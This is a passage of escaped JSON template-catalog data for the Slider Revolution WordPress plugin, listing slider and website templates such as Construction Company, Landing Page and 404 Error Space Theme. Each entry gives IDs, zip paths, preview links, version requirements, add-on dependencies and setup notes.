Website template is a minimal one-page website with all the essential modules. Usable and quickly customizable.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Basic Website\",\"package_order\":\"8\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"25\",\"installed\":false},\"315\":{\"id\":\"340\",\"title\":\"Basic Lightbox\",\"alias\":\"basic-lightbox\",\"zip\":\"packs\\/basic-lightbox.zip\",\"uid\":\"e4b025b300b1a8f417d04eb80113fac2\",\"img\":\"basic-lightbox\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/basic-website\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=basic-website\",\"version\":\"1.0.1\",\"required\":\"6.0.0\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Basic Website template is a minimal one-page website with all the essential modules. Usable and quickly customizable.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Basic Website\",\"package_order\":\"9\",\"package_parent\":\"\",\"modal\":\"1\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"25\",\"installed\":false},\"316\":{\"id\":\"341\",\"title\":\"Nature Slider\",\"alias\":\"nature-slider\",\"zip\":\"nature-slider.zip\",\"uid\":\"eef1a4584ec1c3b8c26c305cca44e805\",\"img\":\"nature-slider\\/slide1.jpg\",\"preview\":\"http:\\/\\/revolution.themepunch.com\\/nature-explorer-slider\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=nature-explorer-slider\",\"version\":\"1.0.0\",\"required\":\"6.0.0\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Nature Explorer Slider Template uses the Distortion and Particle Effects Add-Ons.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-particles-addon\\\\\\/revslider-particles-addon.php\\\",\\\"name\\\":\\\"Particles Effect AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"},{\\\"path\\\":\\\"revslider-liquideffect-addon\\\\\\/revslider-liquideffect-addon.php\\\",\\\"name\\\":\\\"Distortion Effect AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"0000-00-00 00:00:00\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Design a Featured Post Slider That Impresses Readers [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/featured-post-slider\\/\",\"guide_img\":\"tutorial\\/nature-slider.png\",\"active\":\"1\",\"installed\":false},\"317\":{\"id\":\"342\",\"title\":\"Art Gallery\",\"alias\":\"art-gallery\",\"zip\":\"art-gallery.zip\",\"uid\":\"b8c5095ae3407337e6e5b2a8515e7d6e\",\"img\":\"art-gallery\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/art-gallery-slider-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=art-gallery-slider-template\",\"version\":\"1.0.1\",\"required\":\"6.2.22\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">A modern slider with large, geometric elements and interesting mask animations.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"Promote Your Most Recent Content with a Colorful Hero Design [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/promote-your-most-recent-content-with-a-colorful-hero-design\\/\",\"guide_img\":\"tutorial\\/Art-Gallery-Slider.png\",\"active\":\"1\",\"installed\":false},\"318\":{\"id\":\"343\",\"title\":\"Construction Company\",\"alias\":\"construction-company-website\",\"zip\":\"\",\"uid\":\"construction-company-website-package\",\"img\":\"packages\\/construction_package.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/construction-company-website\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=construction-company-website\",\"version\":\"1.0.1\",\"required\":\"6.0.0\",\"width\":\"1024\",\"height\":\"768\",\"description\":\"<span class=\\\"ttm_content\\\">The Construction Company is the perfect introduction to your Construction themed website. Showcase your current projects, services and contact information with sleek transitions!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"website\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-revealer-addon\\\\\\/revslider-revealer-addon.php\\\",\\\"name\\\":\\\"Reveal AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"0000-00-00 00:00:00\",\"package\":\"Construction Company\",\"package_order\":\"0\",\"package_parent\":\"true\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"26\",\"installed\":false},\"319\":{\"id\":\"344\",\"title\":\"Construction Header\",\"alias\":\"Construction-Header\",\"zip\":\"packs\\/Construction-Header.zip\",\"uid\":\"5c77de774b8f5487c1276c4a7b3dc80c\",\"img\":\"Construction-Header\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/construction-company-website\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=construction-company-website\",\"version\":\"1.0.1\",\"required\":\"6.0.0\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Construction Company is the perfect introduction to your Construction themed website. Showcase your current projects, services and contact information with sleek transitions!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Construction Company\",\"package_order\":\"1\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"26\",\"installed\":false},\"320\":{\"id\":\"345\",\"title\":\"Construction Home\",\"alias\":\"Construction-Home\",\"zip\":\"packs\\/Construction-Home.zip\",\"uid\":\"fcb277f0c07dad270d2a7cef4431bef8\",\"img\":\"Construction-Home\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/construction-company-website\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=construction-company-website\",\"version\":\"1.0.1\",\"required\":\"6.0.0\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Construction Company is the perfect introduction to your Construction themed website. Showcase your current projects, services and contact information with sleek transitions!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Construction Company\",\"package_order\":\"2\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"26\",\"installed\":false},\"321\":{\"id\":\"346\",\"title\":\"Construction Projects\",\"alias\":\"Construction-Projects\",\"zip\":\"packs\\/Construction-Projects.zip\",\"uid\":\"0c847173c3739f79778dc2c0fc9704e4\",\"img\":\"Construction-Projects\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/construction-company-website\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=construction-company-website\",\"version\":\"1.0.1\",\"required\":\"6.0.0\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Construction Company is the perfect introduction to your Construction themed website. Showcase your current projects, services and contact information with sleek transitions!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Construction Company\",\"package_order\":\"3\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"26\",\"installed\":false},\"322\":{\"id\":\"347\",\"title\":\"Construction History\",\"alias\":\"Construction-History\",\"zip\":\"packs\\/Construction-History.zip\",\"uid\":\"758da120c4b6c5606692faf0aa43aac6\",\"img\":\"Construction-History\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/construction-company-website\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=construction-company-website\",\"version\":\"1.0.1\",\"required\":\"6.0.0\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Construction Company is the perfect introduction to your Construction themed website. Showcase your current projects, services and contact information with sleek transitions!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Construction Company\",\"package_order\":\"4\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"26\",\"installed\":false},\"323\":{\"id\":\"348\",\"title\":\"Construction Services\",\"alias\":\"Construction-Services\",\"zip\":\"packs\\/Construction-Services.zip\",\"uid\":\"5ad5b841c1d89e97ddbf972c8b11abd4\",\"img\":\"Construction-Services\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/construction-company-website\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=construction-company-website\",\"version\":\"1.0.1\",\"required\":\"6.0.0\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Construction Company is the perfect introduction to your Construction themed website. Showcase your current projects, services and contact information with sleek transitions!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Construction Company\",\"package_order\":\"5\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"zindex=\\\"10\\\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"26\",\"installed\":false},\"324\":{\"id\":\"349\",\"title\":\"Construction Contacts\",\"alias\":\"Construction-Contacts\",\"zip\":\"packs\\/Construction-Contacts.zip\",\"uid\":\"b8c3c34046bb91ebb243e4da64745d37\",\"img\":\"Construction-Contacts\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/construction-company-website\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=construction-company-website\",\"version\":\"1.0.1\",\"required\":\"6.0.0\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Construction Company is the perfect introduction to your Construction themed website. Showcase your current projects, services and contact information with sleek transitions!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Construction Company\",\"package_order\":\"6\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"26\",\"installed\":false},\"325\":{\"id\":\"350\",\"title\":\"Classic Cars Evolution\",\"alias\":\"Classic-Cars-Evolution\",\"zip\":\"Classic-Cars-Evolution.zip\",\"uid\":\"7061757f128fd624b0227715dab73b74\",\"img\":\"Classic-Cars-Evolution\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/classic-cars-before-after-hero\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=classic-cars-before-after-hero\",\"version\":\"1.0.2\",\"required\":\"6.0.0\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Classic Cars Evolution Slider is a great example of our popular before & after Add-On.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-beforeafter-addon\\\\\\/revslider-beforeafter-addon.php\\\",\\\"name\\\":\\\"Before After AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"0000-00-00 00:00:00\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Create an Interactive Before-and-After Image Slider [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-create-an-interactive-before-and-after-image-slider\\/\",\"guide_img\":\"tutorial\\/Classic-Cars-Evolution.jpg\",\"active\":\"1\",\"installed\":false},\"326\":{\"id\":\"351\",\"title\":\"404 Error Space Theme\",\"alias\":\"404-Error-Space-Theme\",\"zip\":\"404-Error-Space-Theme.zip\",\"uid\":\"6412adc7ec025826328e40e552a14e1e\",\"img\":\"404-Error-Space-Theme\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/404-error-page\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=404-error-page\",\"version\":\"1.0.2\",\"required\":\"6.0.0\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Classic Cars Evolution Slider is the perfect way to make your error page more beautiful.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Create a 404 Page That Will Convert Instead of Cost You Visitors [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-create-a-404-page\\/\",\"guide_img\":\"tutorial\\/404-Error-Space-Theme.png\",\"active\":\"1\",\"installed\":false},\"327\":{\"id\":\"352\",\"title\":\"Landing Page\",\"alias\":\"landing-page-website\",\"zip\":\"\",\"uid\":\"landing-page-website-package\",\"img\":\"packages\\/lp_package.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/landing-page-builder\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=landing-page-builder\",\"version\":\"1.0.0\",\"required\":\"6.0.8\",\"width\":\"1024\",\"height\":\"768\",\"description\":\"<span class=\\\"ttm_content\\\">Landing Page is a one-page website template with standard modules to build an effective landing page for your business\\/product.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">After installing this template package, please remove the \\\"price modal\\\" module shortcode from the automatically created page. Also, a small modification is needed in these templates: \\\"Landing Page Hero\\\", \\\"Landing page Call to Action\\\" and \\\"Landing Page Footer\\\". Click the buttons in these template and then go to \\\"layer -> actions\\\" and set the target of the \\\"Open Slider Modal\\\" action to the \\\"Landing Page Price Modal\\\".<\\/span>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Landing Page\",\"package_order\":\"0\",\"package_parent\":\"true\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"27\",\"installed\":false},\"328\":{\"id\":\"353\",\"title\":\"Landing Page Hero\",\"alias\":\"landing-page-hero\",\"zip\":\"packs\\/landing-page-hero.zip\",\"uid\":\"d328635caa20da7ee8a3ab687f8656ff\",\"img\":\"landing-page-hero\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/landing-page-builder\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=landing-page-builder\",\"version\":\"1.0.0\",\"required\":\"6.0.8\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">Landing Page is a one-page website template with standard modules to build an effective landing page for your business\\/product.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">After installing this template package, please remove the \\\"price modal\\\" module shortcode from the automatically created page. Also, a small modification is needed in these templates: \\\"Landing Page Hero\\\", \\\"Landing page Call to Action\\\" and \\\"Landing Page Footer\\\". Click the buttons in these template and then go to \\\"layer -> actions\\\" and set the target of the \\\"Open Slider Modal\\\" action to the \\\"Landing Page Price Modal\\\".<\\/span>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Landing Page\",\"package_order\":\"1\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"27\",\"installed\":false},\"329\":{\"id\":\"354\",\"title\":\"Landing Page Features\",\"alias\":\"landing-page-features\",\"zip\":\"packs\\/landing-page-features.zip\",\"uid\":\"6552bc72abace10918a64866d9bb79c1\",\"img\":\"landing-page-features\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/landing-page-builder\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=landing-page-builder\",\"version\":\"1.0.1\",\"required\":\"6.0.8\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">Landing Page is a one-page website template with standard modules to build an effective landing page for your business\\/product.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">After installing this template package, please remove the \\\"price modal\\\" module shortcode from the automatically created page. Also, a small modification is needed in these templates: \\\"Landing Page Hero\\\", \\\"Landing page Call to Action\\\" and \\\"Landing Page Footer\\\". Click the buttons in these template and then go to \\\"layer -> actions\\\" and set the target of the \\\"Open Slider Modal\\\" action to the \\\"Landing Page Price Modal\\\".<\\/span>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Landing Page\",\"package_order\":\"3\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"27\",\"installed\":false},\"330\":{\"id\":\"355\",\"title\":\"Landing Page Callout\",\"alias\":\"landing-page-callout\",\"zip\":\"packs\\/landing-page-callout.zip\",\"uid\":\"c5b101ea5471e7409ae7effa8d45fbcf\",\"img\":\"landing-page-callout\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/landing-page-builder\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=landing-page-builder\",\"version\":\"1.0.1\",\"required\":\"6.0.8\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">Landing Page is a one-page website template with standard modules to build an effective landing page for your business\\/product.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">After installing this template package, please remove the \\\"price modal\\\" module shortcode from the automatically created page. Also, a small modification is needed in these templates: \\\"Landing Page Hero\\\", \\\"Landing page Call to Action\\\" and \\\"Landing Page Footer\\\". Click the buttons in these template and then go to \\\"layer -> actions\\\" and set the target of the \\\"Open Slider Modal\\\" action to the \\\"Landing Page Price Modal\\\".<\\/span>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Landing Page\",\"package_order\":\"4\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"27\",\"installed\":false},\"331\":{\"id\":\"356\",\"title\":\"Landing Page Content\",\"alias\":\"landing-page-content\",\"zip\":\"packs\\/landing-page-content.zip\",\"uid\":\"34da8057a6bb3677c9adf9f18ffc6cf0\",\"img\":\"landing-page-content\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/landing-page-builder\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=landing-page-builder\",\"version\":\"1.0.1\",\"required\":\"6.0.8\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">Landing Page is a one-page website template with standard modules to build an effective landing page for your business\\/product.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">After installing this template package, please remove the \\\"price modal\\\" module shortcode from the automatically created page. Also, a small modification is needed in these templates: \\\"Landing Page Hero\\\", \\\"Landing page Call to Action\\\" and \\\"Landing Page Footer\\\". Click the buttons in these template and then go to \\\"layer -> actions\\\" and set the target of the \\\"Open Slider Modal\\\" action to the \\\"Landing Page Price Modal\\\".<\\/span>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Landing Page\",\"package_order\":\"2\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"27\",\"installed\":false},\"332\":{\"id\":\"357\",\"title\":\"Landing Page Testimonials\",\"alias\":\"landing-page-testimonials\",\"zip\":\"packs\\/landing-page-testimonials.zip\",\"uid\":\"a83606e311cd5115422d86f04890cbf1\",\"img\":\"landing-page-testimonials\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/landing-page-builder\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=landing-page-builder\",\"version\":\"1.0.0\",\"required\":\"6.0.8\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">Landing Page is a one-page website template with standard modules to build an effective landing page for your business\\/product.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">After installing this template package, please remove the \\\"price modal\\\" module shortcode from the automatically created page. Also, a small modification is needed in these templates: \\\"Landing Page Hero\\\", \\\"Landing page Call to Action\\\" and \\\"Landing Page Footer\\\". Click the buttons in these template and then go to \\\"layer -> actions\\\" and set the target of the \\\"Open Slider Modal\\\" action to the \\\"Landing Page Price Modal\\\".<\\/span>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Landing Page\",\"package_order\":\"5\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"27\",\"installed\":false},\"333\":{\"id\":\"358\",\"title\":\"Landing Page Call to 